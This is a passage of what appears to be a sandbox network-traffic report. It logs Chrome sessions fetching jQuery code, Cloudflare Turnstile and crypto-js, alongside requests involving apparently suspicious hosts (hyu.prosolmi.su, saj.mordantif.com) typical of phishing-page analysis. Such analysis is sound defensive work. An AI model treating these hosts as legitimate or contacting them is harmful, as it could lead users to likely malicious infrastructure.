                                                        2024-09-13 13:06:32 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                                        Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                                        2024-09-13 13:06:32 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                                        Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                                        2024-09-13 13:06:32 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                        Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                                        2024-09-13 13:06:32 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                        Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        12192.168.2.549731188.114.96.34433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:06:32 UTC404OUTGET /303099441074343CfLSMHKSVVDKIFYXJFBCMGNWLKLWUCXXAXBRXOUIETMQLASTZV HTTP/1.1
                                                        Host: hyu.prosolmi.su
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-09-13 13:06:33 UTC606INHTTP/1.1 200 OK
                                                        Date: Fri, 13 Sep 2024 13:06:32 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TCeAppMGnrwIYH%2B4gsr586WWO2GcsJj55whXUMSwGnQb5edrrUG31PlpMGxUu1XBt2zdT5SfxU%2FpC9lByjshK5RU21cpdCtGA1fNhOKm9y306kwruqmA%2BSRh7xKf2akYncA%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8c285aea6ffa5e71-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-09-13 13:06:33 UTC6INData Raw: 31 0d 0a 30 0d 0a
                                                        Data Ascii: 10
                                                        2024-09-13 13:06:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        13192.168.2.549733104.18.95.414433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:06:32 UTC648OUTGET /turnstile/v0/b/388c99dd0998/api.js HTTP/1.1
                                                        Host: challenges.cloudflare.com
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: */*
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: script
                                                        Referer: https://saj.mordantif.com/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-09-13 13:06:32 UTC471INHTTP/1.1 200 OK
                                                        Date: Fri, 13 Sep 2024 13:06:32 GMT
                                                        Content-Type: application/javascript; charset=UTF-8
                                                        Content-Length: 47262
                                                        Connection: close
                                                        accept-ranges: bytes
                                                        last-modified: Wed, 11 Sep 2024 15:58:53 GMT
                                                        cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                        access-control-allow-origin: *
                                                        cross-origin-resource-policy: cross-origin
                                                        Server: cloudflare
                                                        CF-RAY: 8c285aeb2c1f432c-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-09-13 13:06:32 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 56 74 28 65 2c 72 2c 61 2c 6f 2c 63 2c 6c 2c 67 29 7b 74 72 79 7b 76 61 72 20 66 3d 65 5b 6c 5d 28 67 29 2c 70 3d 66 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 73 29 7b 61 28 73 29 3b 72 65 74 75 72 6e 7d 66 2e 64 6f 6e 65 3f 72 28 70 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 70 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 61 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 6c 3d 65 2e 61 70 70 6c 79 28 72 2c 61 29 3b 66 75 6e 63 74
                                                        Data Ascii: "use strict";(function(){function Vt(e,r,a,o,c,l,g){try{var f=e[l](g),p=f.value}catch(s){a(s);return}f.done?r(p):Promise.resolve(p).then(o,c)}function Wt(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var l=e.apply(r,a);funct
                                                        2024-09-13 13:06:32 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 52 72 28 65 2c 72 29 7b 76 61 72 20 61 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 61 2e 70 75 73 68 2e 61 70 70 6c 79 28 61 2c 6f 29 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 74 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                        Data Ascii: e}function Rr(e,r){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),a.push.apply(a,o)}return a}function tt(e,r){return r=r!=nu
                                                        2024-09-13 13:06:32 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 61 29 29 72 65 74 75 72 6e 20 72 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 48 74 28 65 29 7c 7c 42 74 28 65 2c 72 29 7c 7c 71 74 28 65 2c 72 29 7c 7c 6a 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 50 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 44 65 28 65 2c 72 29 7b 76 61 72 20 61 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6c 5b 30
                                                        Data Ascii: ray$/.test(a))return rt(e,r)}}function Ae(e,r){return Ht(e)||Bt(e,r)||qt(e,r)||jt()}function P(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function De(e,r){var a={label:0,sent:function(){if(l[0
                                                        2024-09-13 13:06:32 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 47 74 3d 33 30 30 30 32 30 3b 76 61 72 20 50 65 3d 33 30 30 30 33 30 3b 76 61 72 20 55 65 3d 33 30 30 30 33 31 3b 76 61 72 20 71 3b 28 66 75
                                                        Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Gt=300020;var Pe=300030;var Ue=300031;var q;(fu
                                                        2024-09-13 13:06:32 UTC1369INData Raw: 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 52 45 4e 44 45 52 3d 22 72 65 6e 64 65 72 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 7d 29 28 70 65 7c 7c 28 70 65 3d 7b 7d 29 29 3b 76 61 72 20 6f 65 3b 28 66 75 6e
                                                        Data Ascii: e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(function(e){e.RENDER="render",e.EXECUTE="execute"})(pe||(pe={}));var oe;(fun
                                                        2024-09-13 13:06:32 UTC1369INData Raw: 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73 65 74 28 22 6f 66 66 6c 61 62 65 6c 22 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 6f 66 66 6c 61 62 65 6c 29 2c 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 2e 63 6c 65 61 72 61 6e 63 65 5f 6c 65 76 65 6c 21 3d 3d 22 64 65 66 61 75 6c 74 22 26 26 72 2e 73
                                                        Data Ascii: function gt(e){var r=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(e.params._debugSitekeyOverrides.offlabel!=="default"&&r.set("offlabel",e.params._debugSitekeyOverrides.offlabel),e.params._debugSitekeyOverrides.clearance_level!=="default"&&r.s
                                                        2024-09-13 13:06:32 UTC1369INData Raw: 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 6c 2c 67 3d 4c 28 43 72 2c 28 6c 3d 28 72 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 72 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 72 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c 6c 26 26 6c 21 3d 3d 76 6f 69 64 20 30 3f 6c 3a 22 6e 6f 6e 65 78 69 73 74 65 6e 74 22 29 2c 66 2c 70 3d 4c 28 4e 72 2c 28 66 3d 28 61 3d 65 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 61 3d 3d 3d 76 6f 69 64 20 30 3f 76 6f 69 64 20 30 3a 61 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 21 3d 3d 6e 75 6c
                                                        Data Ascii: ==Se.FAILURE_FEEDBACK||e.state===Se.FAILURE_HAVING_TROUBLES,l,g=L(Cr,(l=(r=e.displayLanguage)===null||r===void 0?void 0:r.toLowerCase())!==null&&l!==void 0?l:"nonexistent"),f,p=L(Nr,(f=(a=e.displayLanguage)===null||a===void 0?void 0:a.toLowerCase())!==nul
                                                        2024-09-13 13:06:32 UTC1369INData Raw: 7b 72 65 74 75 72 6e 20 42 65 28 29 3f 49 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 49 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 6c 2c 67 29 7b 76 61 72 20 66 3d 5b 6e 75 6c 6c 5d 3b 66 2e 70 75 73 68 2e 61 70 70 6c 79 28 66 2c 6c 29 3b 76 61 72 20 70 3d 46 75 6e 63 74 69 6f 6e 2e 62 69 6e 64 2e 61 70 70 6c 79 28 63 2c 66 29 2c 73 3d 6e 65 77 20 70 3b 72 65 74 75 72 6e 20 67 26 26 4a 28 73 2c 67 2e 70 72 6f 74 6f 74 79 70 65 29 2c 73 7d 2c 49 65 2e 61 70 70 6c 79 28 6e 75 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 63 65 28 65 29 7b 72 65 74 75 72 6e 20 63 65 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3a 66 75 6e 63 74 69 6f 6e
                                                        Data Ascii: {return Be()?Ie=Reflect.construct:Ie=function(c,l,g){var f=[null];f.push.apply(f,l);var p=Function.bind.apply(c,f),s=new p;return g&&J(s,g.prototype),s},Ie.apply(null,arguments)}function ce(e){return ce=Object.setPrototypeOf?Object.getPrototypeOf:function
                                                        2024-09-13 13:06:32 UTC1369INData Raw: 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 71 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 73 57 69 74 68 28 57 65 29 3f 65 2e 73 75 62 73 74 72 69 6e 67 28 57 65 2e 6c 65 6e 67 74 68 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 4b 28 65 29 7b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 57 65 29 2e 63 6f 6e 63 61 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 54 74 28 29 7b 76 61 72 20 65 3d 2f 5c 2f 74 75 72 6e 73 74 69 6c 65 5c 2f 76 30 28 5c 2f 2e 2a 29 3f 5c 2f 61 70 69 5c 2e 6a 73 2f 2c 72 3d 64 6f 63 75 6d 65 6e 74 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 3b 69 66 28 55 28
                                                        Data Ascii: tion b(e){console.warn("[Cloudflare Turnstile] ".concat(e))}function qe(e){return e.startsWith(We)?e.substring(We.length):null}function K(e){return"".concat(We).concat(e)}function Tt(){var e=/\/turnstile\/v0(\/.*)?\/api\.js/,r=document.currentScript;if(U(
                                                        2024-09-13 13:06:32 UTC1369INData Raw: 64 65 6e 22 2c 66 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 66 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 34 29 22 3b 76 61 72 20 70 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 70 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 74 61 62 6c 65 2d 63 65 6c 6c 22 2c 70 2e 73 74 79 6c 65 2e 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 2c 70 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 70 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 3b 76 61 72 20 73 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 73 2e 63 6c 61 73 73 4e 61 6d 65
                                                        Data Ascii: den",f.style.overflowY="auto",f.style.background="rgba(0,0,0,0.4)";var p=document.createElement("div");p.style.display="table-cell",p.style.verticalAlign="middle",p.style.width="100vw",p.style.height="100vh";var s=document.createElement("div");s.className


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        14192.168.2.549735104.17.25.144433624C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-09-13 13:06:32 UTC386OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                                        Host: cdnjs.cloudflare.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2024-09-13 13:06:33 UTC961INHTTP/1.1 200 OK
                                                        Date: Fri, 13 Sep 2024 13:06:33 GMT
                                                        Content-Type: application/javascript; charset=utf-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        Cache-Control: public, max-age=30672000
                                                        ETag: W/"61182885-40eb"
                                                        Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                                        cf-cdnjs-via: cfworker/kv
                                                        Cross-Origin-Resource-Policy: cross-origin
                                                        Timing-Allow-Origin: *
                                                        X-Content-Type-Options: nosniff
                                                        CF-Cache-Status: HIT
                                                        Age: 79692
                                                        Expires: Wed, 03 Sep 2025 13:06:33 GMT
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kFv8yU9NAbKcC6ItKx3Xc3lNcJ%2F9vMggFinsMi75%2FVoZ3V2FzjTLeN4EMlQI5dbKhVyVDBSz3vKiyCOhvuWRfNAB0InxUHIUsSA4D2YWA1mn9hEwTwQL93bD9h8PD%2BvInb3Ke%2FC%2B"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                        Strict-Transport-Security: max-age=15780000
                                                        Server: cloudflare
                                                        CF-RAY: 8c285aec6b5617a5-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2024-09-13 13:06:33 UTC408INData Raw: 37 62 66 30 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                        Data Ascii: 7bf0!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
